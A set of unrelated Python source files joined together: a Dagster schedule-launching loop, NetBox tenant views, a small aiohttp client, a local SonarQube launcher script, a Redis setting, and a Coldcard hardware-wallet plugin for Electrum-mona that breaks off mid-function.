from dagster.core.storage.tags import RUN_KEY_TAG, SCHEDULED_EXECUTION_TIME_TAG, check_tags
from dagster.core.workspace import IWorkspace
from dagster.seven.compat.pendulum import to_timezone
from dagster.utils import merge_dicts
from dagster.utils.error import serializable_error_info_from_exc_info
from dagster.utils.log import default_date_format_string
class _ScheduleLaunchContext:
def __init__(self, tick, instance, logger):
self._instance = instance
self._logger = logger
self._tick = tick
@property
def failure_count(self) -> int:
return self._tick.job_tick_data.failure_count
def update_state(self, status, error=None, **kwargs):
skip_reason = kwargs.get("skip_reason")
if "skip_reason" in kwargs:
del kwargs["skip_reason"]
self._tick = self._tick.with_status(status=status, error=error, **kwargs)
if skip_reason:
self._tick = self._tick.with_reason(skip_reason=skip_reason)
def add_run(self, run_id, run_key=None):
self._tick = self._tick.with_run(run_id, run_key)
def _write(self):
self._instance.update_job_tick(self._tick)
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
self._write()
MIN_INTERVAL_LOOP_TIME = 5
RELOAD_WORKSPACE = 60
def execute_scheduler_iteration_loop(
instance, workspace, logger, max_catchup_runs, max_tick_retries
):
workspace_loaded_time = pendulum.now("UTC").timestamp()
workspace_iteration = 0
start_time = pendulum.now("UTC").timestamp()
while True:
start_time = pendulum.now("UTC").timestamp()
if start_time - workspace_loaded_time > RELOAD_WORKSPACE:
workspace.cleanup()
workspace_loaded_time = pendulum.now("UTC").timestamp()
workspace_iteration = 0
end_datetime_utc = pendulum.now("UTC")
yield from launch_scheduled_runs(
instance,
workspace,
logger,
end_datetime_utc=end_datetime_utc,
max_catchup_runs=max_catchup_runs,
max_tick_retries=max_tick_retries,
log_verbose_checks=(workspace_iteration == 0),
)
loop_duration = pendulum.now("UTC").timestamp() - start_time
sleep_time = max(0, MIN_INTERVAL_LOOP_TIME - loop_duration)
time.sleep(sleep_time)
yield
workspace_iteration += 1
def launch_scheduled_runs(
instance,
workspace,
logger,
end_datetime_utc,
max_catchup_runs=DEFAULT_MAX_CATCHUP_RUNS,
max_tick_retries=0,
debug_crash_flags=None,
log_verbose_checks=True,
):
check.inst_param(instance, "instance", DagsterInstance)
check.inst_param(workspace, "workspace", IWorkspace)
schedules = [
s
for s in instance.all_stored_job_state(job_type=InstigatorType.SCHEDULE)
if s.status == InstigatorStatus.RUNNING
]
if not schedules:
if log_verbose_checks:
# Only log the "No schedules have been started" warning once per workspace reload
# to avoid spamming the logs
logger.info("Not checking for any runs since no schedules have been started.")
yield
return
if log_verbose_checks:
schedule_names = ", ".join([schedule.job_name for schedule in schedules])
logger.info(f"Checking for new runs for the following schedules: {schedule_names}")
for schedule_state in schedules:
error_info = None
try:
origin = schedule_state.origin.external_repository_origin.repository_location_origin
repo_location = workspace.get_location(origin)
yield from launch_scheduled_runs_for_schedule(
instance,
logger,
schedule_state,
workspace,
repo_location,
end_datetime_utc,
max_catchup_runs,
max_tick_retries,
(debug_crash_flags.get(schedule_state.job_name) if debug_crash_flags else None),
log_verbose_checks=log_verbose_checks,
)
except Exception:
error_info = serializable_error_info_from_exc_info(sys.exc_info())
logger.error(
f"Scheduler caught an error for schedule {schedule_state.job_name} : {error_info.to_string()}"
)
yield error_info
def launch_scheduled_runs_for_schedule(
instance,
logger,
schedule_state,
workspace,
repo_location,
end_datetime_utc,
max_catchup_runs,
max_tick_retries,
debug_crash_flags=None,
log_verbose_checks=True,
):
check.inst_param(instance, "instance", DagsterInstance)
check.inst_param(schedule_state, "schedule_state", InstigatorState)
check.inst_param(end_datetime_utc, "end_datetime_utc", datetime.datetime)
check.inst_param(repo_location, "repo_location", RepositoryLocation)
latest_tick = instance.get_latest_job_tick(schedule_state.job_origin_id)
start_timestamp_utc = schedule_state.job_specific_data.start_timestamp
if latest_tick:
if latest_tick.status == TickStatus.STARTED:
# Scheduler was interrupted while performing this tick, re-do it
start_timestamp_utc = max(start_timestamp_utc, latest_tick.timestamp)
elif (
latest_tick.status == TickStatus.FAILURE
and latest_tick.failure_count <= max_tick_retries
):
# Tick failed and hasn't reached its retry limit, retry it
start_timestamp_utc = max(start_timestamp_utc, latest_tick.timestamp)
else:
start_timestamp_utc = max(start_timestamp_utc, latest_tick.timestamp + 1)
schedule_name = schedule_state.job_name
repo_name = schedule_state.origin.external_repository_origin.repository_name
if not repo_location.has_repository(repo_name):
raise DagsterSchedulerError(
f"Could not find repository {repo_name} in location {repo_location.name} to "
+ f"run schedule {schedule_name}. If this repository no longer exists, you can "
+ "turn off the schedule in the Dagit UI.",
)
external_repo = repo_location.get_repository(repo_name)
if not external_repo.has_external_schedule(schedule_name):
raise DagsterSchedulerError(
f"Could not find schedule {schedule_name} in repository {repo_name}. If this "
"schedule no longer exists, you can turn it off in the Dagit UI.",
)
external_schedule = external_repo.get_external_schedule(schedule_name)
timezone_str = external_schedule.execution_timezone
if not timezone_str:
timezone_str = "UTC"
if log_verbose_checks:
logger.warn(
f"Using UTC as the timezone for {external_schedule.name} as it did not specify "
"an execution_timezone in its definition."
)
tick_times = []
for next_time in external_schedule.execution_time_iterator(start_timestamp_utc):
if next_time.timestamp() > end_datetime_utc.timestamp():
break
tick_times.append(next_time)
if not tick_times:
if log_verbose_checks:
logger.info(f"No new runs for {schedule_name}")
return
if not external_schedule.partition_set_name and len(tick_times) > 1:
logger.warning(f"{schedule_name} has no partition set, so not trying to catch up")
tick_times = tick_times[-1:]
elif len(tick_times) > max_catchup_runs:
logger.warning(f"{schedule_name} has fallen behind, only launching {max_catchup_runs} runs")
tick_times = tick_times[-max_catchup_runs:]
if len(tick_times) == 1:
tick_time = tick_times[0].strftime(default_date_format_string())
logger.info(f"Evaluating schedule `{schedule_name}` at {tick_time}")
else:
times = ", ".join([time.strftime(default_date_format_string()) for time in tick_times])
logger.info(f"Evaluating schedule `{schedule_name}` at the following times: {times}")
for schedule_time in tick_times:
schedule_timestamp = schedule_time.timestamp()
schedule_time_str = schedule_time.strftime(default_date_format_string())
if latest_tick and latest_tick.timestamp == schedule_timestamp:
tick = latest_tick
if latest_tick.status == TickStatus.FAILURE:
logger.info(f"Retrying previously failed schedule execution at {schedule_time_str}")
else:
logger.info(
f"Resuming previously interrupted schedule execution at {schedule_time_str}"
)
else:
tick = instance.create_job_tick(
TickData(
job_origin_id=external_schedule.get_external_origin_id(),
job_name=schedule_name,
job_type=InstigatorType.SCHEDULE,
status=TickStatus.STARTED,
timestamp=schedule_timestamp,
)
)
_check_for_debug_crash(debug_crash_flags, "TICK_CREATED")
with _ScheduleLaunchContext(tick, instance, logger) as tick_context:
try:
_check_for_debug_crash(debug_crash_flags, "TICK_HELD")
yield from _schedule_runs_at_time(
instance,
logger,
workspace,
repo_location,
external_repo,
external_schedule,
schedule_time,
tick_context,
debug_crash_flags,
)
except Exception as e:
if isinstance(e, DagsterUserCodeUnreachableError):
try:
raise DagsterSchedulerError(
f"Unable to reach the user code server for schedule {schedule_name}. Schedule will resume execution once the server is available."
) from e
except:
error_data = serializable_error_info_from_exc_info(sys.exc_info())
tick_context.update_state(
TickStatus.FAILURE,
error=error_data,
# don't increment the failure count - retry forever until the server comes back up
# or the schedule is turned off
failure_count=tick_context.failure_count,
)
raise # Raise the wrapped DagsterSchedulerError exception
else:
error_data = serializable_error_info_from_exc_info(sys.exc_info())
tick_context.update_state(
TickStatus.FAILURE,
error=error_data,
failure_count=tick_context.failure_count + 1,
)
raise
def _check_for_debug_crash(debug_crash_flags, key):
if not debug_crash_flags:
return
kill_signal = debug_crash_flags.get(key)
if not kill_signal:
return
os.kill(os.getpid(), kill_signal)
time.sleep(10)
raise Exception("Process didn't terminate after sending crash signal")
def _schedule_runs_at_time(
instance,
logger,
workspace,
repo_location,
external_repo,
external_schedule,
schedule_time,
tick_context,
debug_crash_flags,
):
schedule_name = external_schedule.name
pipeline_selector = PipelineSelector(
location_name=repo_location.name,
repository_name=external_repo.name,
pipeline_name=external_schedule.pipeline_name,
solid_selection=external_schedule.solid_selection,
)
external_pipeline = repo_location.get_external_pipeline(pipeline_selector)
schedule_execution_data = repo_location.get_external_schedule_execution_data(
instance=instance,
repository_handle=external_repo.handle,
schedule_name=external_schedule.name,
scheduled_execution_time=schedule_time,
)
yield
if not schedule_execution_data.run_requests:
if schedule_execution_data.skip_message:
logger.info(
f"Schedule {external_schedule.name} skipped: {schedule_execution_data.skip_message}"
)
else:
logger.info(f"No run requests returned for {external_schedule.name}, skipping")
# Update tick to skipped state and return
tick_context.update_state(
TickStatus.SKIPPED, skip_reason=schedule_execution_data.skip_message
)
return
for run_request in schedule_execution_data.run_requests:
run = _get_existing_run_for_request(instance, external_schedule, schedule_time, run_request)
if run:
if run.status != PipelineRunStatus.NOT_STARTED:
# A run already exists and was launched for this time period,
# but the scheduler must have crashed or errored before the tick could be put
# into a SUCCESS state
logger.info(
f"Run {run.run_id} already completed for this execution of {external_schedule.name}"
)
tick_context.add_run(run_id=run.run_id, run_key=run_request.run_key)
yield
continue
else:
logger.info(
f"Run {run.run_id} already created for this execution of {external_schedule.name}"
)
else:
run = _create_scheduler_run(
instance,
schedule_time,
repo_location,
external_schedule,
external_pipeline,
run_request,
)
_check_for_debug_crash(debug_crash_flags, "RUN_CREATED")
if run.status != PipelineRunStatus.FAILURE:
try:
instance.submit_run(run.run_id, workspace)
logger.info(f"Completed scheduled launch of run {run.run_id} for {schedule_name}")
except Exception:
error_info = serializable_error_info_from_exc_info(sys.exc_info())
logger.error(
f"Run {run.run_id} created successfully but failed to launch: {str(serializable_error_info_from_exc_info(sys.exc_info()))}"
)
yield error_info
_check_for_debug_crash(debug_crash_flags, "RUN_LAUNCHED")
tick_context.add_run(run_id=run.run_id, run_key=run_request.run_key)
_check_for_debug_crash(debug_crash_flags, "RUN_ADDED")
yield
_check_for_debug_crash(debug_crash_flags, "TICK_SUCCESS")
tick_context.update_state(TickStatus.SUCCESS)
def _get_existing_run_for_request(instance, external_schedule, schedule_time, run_request):
tags = merge_dicts(
PipelineRun.tags_for_schedule(external_schedule),
{
SCHEDULED_EXECUTION_TIME_TAG: to_timezone(schedule_time, "UTC").isoformat(),
},
)
if run_request.run_key:
tags[RUN_KEY_TAG] = run_request.run_key
runs_filter = PipelineRunsFilter(tags=tags)
existing_runs = instance.get_runs(runs_filter)
if not len(existing_runs):
return None
return existing_runs[0]
def _create_scheduler_run(
instance,
schedule_time,
repo_location,
external_schedule,
external_pipeline,
run_request,
):
run_config = run_request.run_config
schedule_tags = run_request.tags
external_execution_plan = repo_location.get_external_execution_plan(
external_pipeline,
run_config,
external_schedule.mode,
step_keys_to_execute=None,
known_state=None,
)
execution_plan_snapshot = external_execution_plan.execution_plan_snapshot
pipeline_tags = external_pipeline.tags or {}
check_tags(pipeline_tags, "pipeline_tags")
tags = merge_dicts(pipeline_tags, schedule_tags)
tags[SCHEDULED_EXECUTION_TIME_TAG] = to_timezone(schedule_time, "UTC").isoformat()
if run_request.run_key:
tags[RUN_KEY_TAG] = run_request.run_key
return instance.create_run(
pipeline_name=external_schedule.pipeline_name,
run_id=None,
run_config=run_config,
mode=external_schedule.mode,
solids_to_execute=external_pipeline.solids_to_execute,
step_keys_to_execute=None,
solid_selection=external_pipeline.solid_selection,
status=PipelineRunStatus.NOT_STARTED,
root_run_id=None,
parent_run_id=None,
tags=tags,
pipeline_snapshot=external_pipeline.pipeline_snapshot,
execution_plan_snapshot=execution_plan_snapshot,
parent_pipeline_snapshot=external_pipeline.parent_pipeline_snapshot,
external_pipeline_origin=external_pipeline.get_external_origin(),
pipeline_code_origin=external_pipeline.get_python_origin(),
)
|
from django.contrib.auth.mixins import PermissionRequiredMixin
from django.db.models import Count
from django.shortcuts import get_object_or_404, render
from django.views.generic import View
from circuits.models import Circuit
from dcim.models import Site, Rack, Device, RackReservation
from ipam.models import IPAddress, Prefix, VLAN, VRF
from utilities.views import (
BulkDeleteView, BulkEditView, BulkImportView, ObjectDeleteView, ObjectEditView, ObjectListView,
)
from virtualization.models import VirtualMachine, Cluster
from . import filters, forms, tables
from .models import Tenant, TenantGroup
#
# Tenant groups
#
class TenantGroupListView(PermissionRequiredMixin, ObjectListView):
permission_required = 'tenancy.view_tenantgroup'
queryset = TenantGroup.objects.annotate(tenant_count=Count('tenants'))
table = tables.TenantGroupTable
class TenantGroupCreateView(PermissionRequiredMixin, ObjectEditView):
permission_required = 'tenancy.add_tenantgroup'
model = TenantGroup
model_form = forms.TenantGroupForm
default_return_url = 'tenancy:tenantgroup_list'
class TenantGroupEditView(TenantGroupCreateView):
permission_required = 'tenancy.change_tenantgroup'
class TenantGroupBulkImportView(PermissionRequiredMixin, BulkImportView):
permission_required = 'tenancy.add_tenantgroup'
model_form = forms.TenantGroupCSVForm
table = tables.TenantGroupTable
default_return_url = 'tenancy:tenantgroup_list'
class TenantGroupBulkDeleteView(PermissionRequiredMixin, BulkDeleteView):
permission_required = 'tenancy.delete_tenantgroup'
queryset = TenantGroup.objects.annotate(tenant_count=Count('tenants'))
table = tables.TenantGroupTable
default_return_url = 'tenancy:tenantgroup_list'
#
# Tenants
#
class TenantListView(PermissionRequiredMixin, ObjectListView):
permission_required = 'tenancy.view_tenant'
queryset = Tenant.objects.prefetch_related('group')
filterset = filters.TenantFilterSet
filterset_form = forms.TenantFilterForm
table = tables.TenantTable
class TenantView(PermissionRequiredMixin, View):
permission_required = 'tenancy.view_tenant'
def get(self, request, slug):
tenant = get_object_or_404(Tenant, slug=slug)
stats = {
'site_count': Site.objects.filter(tenant=tenant).count(),
'rack_count': Rack.objects.filter(tenant=tenant).count(),
'rackreservation_count': RackReservation.objects.filter(tenant=tenant).count(),
'device_count': Device.objects.filter(tenant=tenant).count(),
'vrf_count': VRF.objects.filter(tenant=tenant).count(),
'prefix_count': Prefix.objects.filter(tenant=tenant).count(),
'ipaddress_count': IPAddress.objects.filter(tenant=tenant).count(),
'vlan_count': VLAN.objects.filter(tenant=tenant).count(),
'circuit_count': Circuit.objects.filter(tenant=tenant).count(),
'virtualmachine_count': VirtualMachine.objects.filter(tenant=tenant).count(),
'cluster_count': Cluster.objects.filter(tenant=tenant).count(),
}
return render(request, 'tenancy/tenant.html', {
'tenant': tenant,
'stats': stats,
})
class TenantCreateView(PermissionRequiredMixin, ObjectEditView):
permission_required = 'tenancy.add_tenant'
model = Tenant
model_form = forms.TenantForm
template_name = 'tenancy/tenant_edit.html'
default_return_url = 'tenancy:tenant_list'
class TenantEditView(TenantCreateView):
permission_required = 'tenancy.change_tenant'
class TenantDeleteView(PermissionRequiredMixin, ObjectDeleteView):
permission_required = 'tenancy.delete_tenant'
model = Tenant
default_return_url = 'tenancy:tenant_list'
class TenantBulkImportView(PermissionRequiredMixin, BulkImportView):
permission_required = 'tenancy.add_tenant'
model_form = forms.TenantCSVForm
table = tables.TenantTable
default_return_url = 'tenancy:tenant_list'
class TenantBulkEditView(PermissionRequiredMixin, BulkEditView):
permission_required = 'tenancy.change_tenant'
queryset = Tenant.objects.prefetch_related('group')
filterset = filters.TenantFilterSet
table = tables.TenantTable
form = forms.TenantBulkEditForm
default_return_url = 'tenancy:tenant_list'
class TenantBulkDeleteView(PermissionRequiredMixin, BulkDeleteView):
permission_required = 'tenancy.delete_tenant'
queryset = Tenant.objects.prefetch_related('group')
filterset = filters.TenantFilterSet
table = tables.TenantTable
default_return_url = 'tenancy:tenant_list'
|
import aiohttp
from shazamio.exceptions import BadMethod
from shazamio.utils import validate_json
class HTTPClient:
@staticmethod
async def request(method: str, url: str, *args, **kwargs) -> dict:
async with aiohttp.ClientSession() as session:
if method.upper() == 'GET':
async with session.get(url, **kwargs) as resp:
return await validate_json(resp, *args)
elif method.upper() == 'POST':
async with session.post(url, **kwargs) as resp:
return await validate_json(resp, *args)
else:
raise BadMethod('Accept only GET/POST')
|
import subprocess
data = ""
with open('scripts/sonarqubeToken', 'r') as tokenFile:
data=tokenFile.read().replace('\n', '')
subprocess.Popen(["./gradlew", "sonarqube", "-Dsonar.host.url=http://localhost:9000", "-Dsonar.login=" + data], close_fds=True)
|
from os import environ
DEFENDER_REDIS_URL = environ.get('REDIS_URL', 'redis://redis:6379') + '/1'
DEFENDER_USE_CELERY = False
|
#
# Coldcard Electrum plugin main code.
#
#
import os, time, io
import traceback
from typing import TYPE_CHECKING, Optional
import struct
from electrum_mona import bip32
from electrum_mona.bip32 import BIP32Node, InvalidMasterKeyVersionBytes
from electrum_mona.i18n import _
from electrum_mona.plugin import Device, hook, runs_in_hwd_thread
from electrum_mona.keystore import Hardware_KeyStore, KeyStoreWithMPK
from electrum_mona.transaction import PartialTransaction
from electrum_mona.wallet import Standard_Wallet, Multisig_Wallet, Abstract_Wallet
from electrum_mona.util import bfh, bh2u, versiontuple, UserFacingException
from electrum_mona.base_wizard import ScriptTypeNotSupported
from electrum_mona.logging import get_logger
from ..hw_wallet import HW_PluginBase, HardwareClientBase
from ..hw_wallet.plugin import LibraryFoundButUnusable, only_hook_if_libraries_available
_logger = get_logger(__name__)
try:
import hid
from ckcc.protocol import CCProtocolPacker, CCProtocolUnpacker
from ckcc.protocol import CCProtoError, CCUserRefused, CCBusyError
from ckcc.constants import (MAX_MSG_LEN, MAX_BLK_LEN, MSG_SIGNING_MAX_LENGTH, MAX_TXN_LEN,
AF_CLASSIC, AF_P2SH, AF_P2WPKH, AF_P2WSH, AF_P2WPKH_P2SH, AF_P2WSH_P2SH)
from ckcc.client import ColdcardDevice, COINKITE_VID, CKCC_PID, CKCC_SIMULATOR_PATH
requirements_ok = True
class ElectrumColdcardDevice(ColdcardDevice):
# avoid use of pycoin for MiTM message signature test
def mitm_verify(self, sig, expect_xpub):
# verify a signature (65 bytes) over the session key, using the master bip32 node
# - customized to use specific EC library of Electrum.
pubkey = BIP32Node.from_xkey(expect_xpub).eckey
try:
pubkey.verify_message_hash(sig[1:65], self.session_key)
return True
except:
return False
except ImportError as e:
if not (isinstance(e, ModuleNotFoundError) and e.name == 'ckcc'):
_logger.exception('error importing coldcard plugin deps')
requirements_ok = False
COINKITE_VID = 0xd13e
CKCC_PID = 0xcc10
CKCC_SIMULATED_PID = CKCC_PID ^ 0x55aa
class CKCCClient(HardwareClientBase):
def __init__(self, plugin, handler, dev_path, *, is_simulator=False):
HardwareClientBase.__init__(self, plugin=plugin)
self.device = plugin.device
self.handler = handler
# if we know what the (xfp, xpub) "should be" then track it here
self._expected_device = None
if is_simulator:
self.dev = ElectrumColdcardDevice(dev_path, encrypt=True)
else:
# open the real HID device
hd = hid.device(path=dev_path)
hd.open_path(dev_path)
self.dev = ElectrumColdcardDevice(dev=hd, encrypt=True)
# NOTE: MiTM test is delayed until we have a hint as to what XPUB we
# should expect. It's also kinda slow.
def __repr__(self):
return '<CKCCClient: xfp=%s label=%r>' % (xfp2str(self.dev.master_fingerprint),
self.label())
@runs_in_hwd_thread
def verify_connection(self, expected_xfp: int, expected_xpub=None):
ex = (expected_xfp, expected_xpub)
if self._expected_device == ex:
# all is as expected
return
if expected_xpub is None:
expected_xpub = self.dev.master_xpub
if ((self._expected_device is not None)
or (self.dev.master_fingerprint != expected_xfp)
or (self.dev.master_xpub != expected_xpub)):
# probably indicating programing error, not hacking
_logger.info(f"xpubs. reported by device: {self.dev.master_xpub}. "
f"stored in file: {expected_xpub}")
raise RuntimeError("Expecting %s but that's not what's connected?!" %
xfp2str(expected_xfp))
# check signature over session key
# - mitm might have lied about xfp and xpub up to here
# - important that we use value capture at wallet creation time, not some value
# we read over USB today
self.dev.check_mitm(expected_xpub=expected_xpub)
self._expected_device = ex
if not getattr(self, 'ckcc_xpub', None):
self.ckcc_xpub = expected_xpub
_logger.info("Successfully verified against MiTM")
def is_pairable(self):
# can't do anything w/ devices that aren't setup (this code not normally reachable)
return bool(self.dev.master_xpub)
@runs_in_hwd_thread
def close(self):
# close the HID device (so can be reused)
self.dev.close()
self.dev = None
def is_initialized(self):
return bool(self.dev.master_xpub)
def label(self):
# 'label' of this Coldcard. Warning: gets saved into wallet file, which might
# not be encrypted, so better for privacy if based on xpub/fingerprint rather than
# USB serial number.
if self.dev.is_simulator:
lab = 'Coldcard Simulator ' + xfp2str(self.dev.master_fingerprint)
elif not self.dev.master_fingerprint:
# failback; not expected
lab = 'Coldcard #' + self.dev.serial
else:
lab = 'Coldcard ' + xfp2str(self.dev.master_fingerprint)
return lab
def manipulate_keystore_dict_during_wizard_setup(self, d: dict):
master_xpub = self.dev.master_xpub
if master_xpub is not None:
try:
node = BIP32Node.from_xkey(master_xpub)
except InvalidMasterKeyVersionBytes:
raise UserFacingException(
_('Invalid xpub magic. Make sure your {} device is set to the correct chain.').format(self.device) + ' ' +
_('You might have to unplug and plug it in again.')
) from None
d['ckcc_xpub'] = master_xpub
@runs_in_hwd_thread
def has_usable_connection_with_device(self):
# Do end-to-end ping test
try:
self.ping_check()
return True
except:
return False
@runs_in_hwd_thread
def get_xpub(self, bip32_path, xtype):
assert xtype in ColdcardPlugin.SUPPORTED_XTYPES
_logger.info('Derive xtype = %r' % xtype)
xpub = self.dev.send_recv(CCProtocolPacker.get_xpub(bip32_path), timeout=5000)
# TODO handle timeout?
# change type of xpub to the requested type
try:
node = BIP32Node.from_xkey(xpub)
except InvalidMasterKeyVersionBytes:
raise UserFacingException(_('Invalid xpub magic. Make sure your {} device is set to the correct chain.')
.format(self.device)) from None
if xtype != 'standard':
xpub = node._replace(xtype=xtype).to_xpub()
return xpub
@runs_in_hwd_thread
def ping_check(self):
# check connection is working
assert self.dev.session_key, 'not encrypted?'
req = b'1234 Electrum Plugin 4321' # free up to 59 bytes
try:
echo = self.dev.send_recv(CCProtocolPacker.ping(req))
assert echo == req
except:
raise RuntimeError("Communication trouble with Coldcard")
@runs_in_hwd_thread
def show_address(self, path, addr_fmt):
# prompt user w/ address, also returns it immediately.
return self.dev.send_recv(CCProtocolPacker.show_address(path, addr_fmt), timeout=None)
@runs_in_hwd_thread
def show_p2sh_address(self, *args, **kws):
# prompt user w/ p2sh address, also returns it immediately.
return self.dev.send_recv(CCProtocolPacker.show_p2sh_address(*args, **kws), timeout=None)
@runs_in_hwd_thread
def get_version(self):
# gives list of strings
return self.dev.send_recv(CCProtocolPacker.version(), timeout=1000).split('\n')
@runs_in_hwd_thread
def sign_message_start(self, path, msg):
# this starts the UX experience.
self.dev.send_recv(CCProtocolPacker.sign_message(msg, path), timeout=None)
@runs_in_hwd_thread
def sign_message_poll(self):
# poll device... if user has approved, will get tuple: (addr, sig) else None
return self.dev.send_recv(CCProtocolPacker.get_signed_msg(), timeout=None)
@runs_in_hwd_thread
def sign_transaction_start(self, raw_psbt: bytes, *, finalize: bool = False):
# Multiple steps to sign:
# - upload binary
# - start signing UX
# - wait for coldcard to complete process, or have it refused.
# - download resulting txn
assert 20 <= len(raw_psbt) < MAX_TXN_LEN, 'PSBT is too big'
dlen, chk = self.dev.upload_file(raw_psbt)
resp = self.dev.send_recv(CCProtocolPacker.sign_transaction(dlen, chk, finalize=finalize),
timeout=None)
if resp != None:
raise ValueError(resp)
@runs_in_hwd_thread
def sign_transaction_poll(self):
# poll device... if user has approved, will get tuple: (legnth, checksum) else None
return self.dev.send_recv(CCProtocolPacker.get_signed_txn(), timeout=None)
@runs_in_hwd_thread
def download_file(self, length, checksum, file_number=1):
# get a file
return self.dev.download_file(length, checksum, file_number=file_number)
class Coldcard_KeyStore(Hardware_KeyStore):
hw_type = 'coldcard'
device = 'Coldcard'
plugin: 'ColdcardPlugin'
def __init__(self, d):
Hardware_KeyStore.__init__(self, d)
# Errors and other user interaction is done through the wallet's
# handler. The handler is per-window and preserved across
# device reconnects
self.force_watching_only = False
self.ux_busy = False
# we need to know at least the fingerprint of the master xpub to verify against MiTM
# - device reports these value during encryption setup process
# - full xpub value now optional
self.ckcc_xpub = d.get('ckcc_xpub', None)
def dump(self):
# our additions to the stored data about keystore -- only during creation?
d = Hardware_KeyStore.dump(self)
d['ckcc_xpub'] = self.ckcc_xpub
return d
def get_xfp_int(self) -> int:
xfp = self.get_root_fingerprint()
assert xfp is not None
return xfp_int_from_xfp_bytes(bfh(xfp))
def get_client(self):
# called when user tries to do something like view address, sign somthing.
# - not called during probing/setup
# - will fail if indicated device can't produce the xpub (at derivation) expected
rv = self.plugin.get_client(self)
if rv:
xfp_int = self.get_xfp_int()
rv.verify_connection(xfp_int, self.ckcc_xpub)
return rv
def give_error(self, message, clear_client=False):
self.logger.info(message)
if not self.ux_busy:
self.handler.show_error(message)
else:
self.ux_busy = False
if clear_client:
self.client = None
raise UserFacingException(message)
def wrap_busy(func):
# decorator: function takes over the UX on the device.
def wrapper(self, *args, **kwargs):
try:
self.ux_busy = True
return func(self, *args, **kwargs)
finally:
self.ux_busy = False
return wrapper
def decrypt_message(self, pubkey, message, password):
raise UserFacingException(_('Encryption and decryption are currently not supported for {}').format(self.device))
@wrap_busy
def sign_message(self, sequence, message, password):
# Sign a message on device. Since we have big screen, of course we
# have to show the message unabiguously there first!
try:
msg = message.encode('ascii', errors='strict')
assert 1 <= len(msg) <= MSG_SIGNING_MAX_LENGTH
except (UnicodeError, AssertionError):
# there are other restrictions on message content,
# but let the device enforce and report those
self.handler.show_error('Only short (%d max) ASCII messages can be signed.'
% MSG_SIGNING_MAX_LENGTH)
return b''
path = self.get_derivation_prefix() + ("/%d/%d" % sequence)
try:
cl = self.get_client()
try:
self.handler.show_message("Signing message (using %s)..." % path)
cl.sign_message_start(path, msg)
while 1:
# How to kill some time, without locking UI?
time.sleep(0.250)
resp = cl.sign_message_poll()
if resp is not None:
break
finally:
self.handler.finished()
assert len(resp) == 2
addr, raw_sig = resp
# already encoded in Bitcoin fashion, binary.
assert 40 < len(raw_sig) <= 65
return raw_sig
except (CCUserRefused, CCBusyError) as exc:
self.handler.show_error(str(exc))
except CCProtoError as exc:
self.logger.exception('Error showing address')
self.handler.show_error('{}\n\n{}'.format(
_('Error showing address') + ':', str(exc)))
except Exception as e:
self.give_error(e, True)
# give empty bytes for error cases; it seems to clear the old signature box
return b''
@wrap_busy
def sign_transaction(self, tx, password):
# Upload PSBT for signing.
# - we can also work offline (without paired device present)
if tx.is_complete():
return
client = self.get_client()
assert client.dev.master_fingerprint == self.get_xfp_int()
raw_psbt = tx.serialize_as_bytes()
try:
try:
self.handler.show_message("Authorize Transaction...")
client.sign_transaction_start(raw_psbt)
while 1:
# How to kill some time, without locking UI?
time.sleep(0.250)
resp = client.sign_transaction_poll()
if resp is not None:
break
rlen, rsha = resp
# download the resulting txn.
raw_resp = client.download_file(rlen, rsha)
finally:
self.handler.finished()
except (CCUserRefused, CCBusyError) as exc:
self.logger.info(f'Did not sign: {exc}')
self.handler.show_error(str(exc))
return
except BaseException as e:
self.logger.exception('')
self.give_error(e, True)
return
tx2 = PartialTransaction.from_raw_psbt(raw_resp)
# apply partial signatures back into txn
tx.combine_with_other_psbt(tx2)
# caller's logic looks at tx now and if it's sufficiently signed,
# will send it if that's the user's intent.
@staticmethod
def _encode_txin_type(txin_type):
# Map from Electrum code names to our code numbers.
return {'standard': AF_CLASSIC, 'p2pkh': AF_CLASSIC,
'p2sh': AF_P2SH,
'p2wpkh-p2sh': AF_P2WPKH_P2SH,
'p2wpkh': AF_P2WPKH,
'p2wsh-p2sh': AF_P2WSH_P2SH,
'p2wsh': AF_P2WSH,
}[txin_type]
@wrap_busy
def show_address(self, sequence, txin_type):
client = self.get_client()
address_path = self.get_derivation_prefix()[2:] + "/%d/%d"%sequence
addr_fmt = self._encode_txin_type(txin_type)
try:
try:
self.handler.show_message(_("Showing address ..."))
dev_addr = client.show_address(address_path, addr_fmt)
# we could double check address here
finally:
self.handler.finished()
except CCProtoError as exc:
self.logger.exception('Error showing address')
self.handler.show_error('{}\n\n{}'.format(
_('Error showing address') + ':', str(exc)))
except BaseException as exc:
self.logger.exception('')
self.handler.show_error(exc)
@wrap_busy
def show_p2sh_address(self, M, script, xfp_paths, txin_type):
client = self.get_client()
addr_fmt = self._encode_txin_type(txin_type)
try:
try:
self.handler.show_message(_("Showing address ..."))
dev_addr = client.show_p2sh_address(M, xfp_paths, script, addr_fmt=addr_fmt)
# we could double check address here
finally:
self.handler.finished()
except CCProtoError as exc:
self.logger.exception('Error showing address')
self.handler.show_error('{}.\n{}\n\n{}'.format(
_('Error showing address'),
_('Make sure you have imported the correct wallet description '
'file on the device for this multisig wallet.'),
str(exc)))
except BaseException as exc:
self.logger.exception('')
self.handler.show_error(exc)
class ColdcardPlugin(HW_PluginBase):
keystore_class = Coldcard_KeyStore
minimum_library = (0, 7, 7)
DEVICE_IDS = [
(COINKITE_VID, CKCC_PID),
(COINKITE_VID, CKCC_SIMULATED_PID)
]
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_devices(self.DEVICE_IDS, plugin=self)
self.device_manager().register_enumerate_func(self.detect_simulator)
def get_library_version(self):
import ckcc
try:
version = ckcc.__version__
except AttributeError:
version = 'unknown'
if requirements_ok:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def detect_simulator(self):
# if there is a simulator running on this machine,
# return details about it so it's offered as a pairing choice
fn = CKCC_SIMULATOR_PATH
if os.path.exists(fn):
return [Device(path=fn,
interface_number=-1,
id_=fn,
product_key=(COINKITE_VID, CKCC_SIMULATED_PID),
usage_page=0,
transport_ui_string='simulator')]
return []
@runs_in_hwd_thread
def create_client(self, device, handler):
if handler:
self.handler = handler
# We are given a HID device, or at least some details about it.
# Not sure why not we aren't just given a HID library handle, but
# the 'path' is unabiguous, so we'll use that.
try:
rv = CKCCClient(self, handler, device.path,
is_simulator=(device.product_key[1] == CKCC_SIMULATED_PID))
return rv
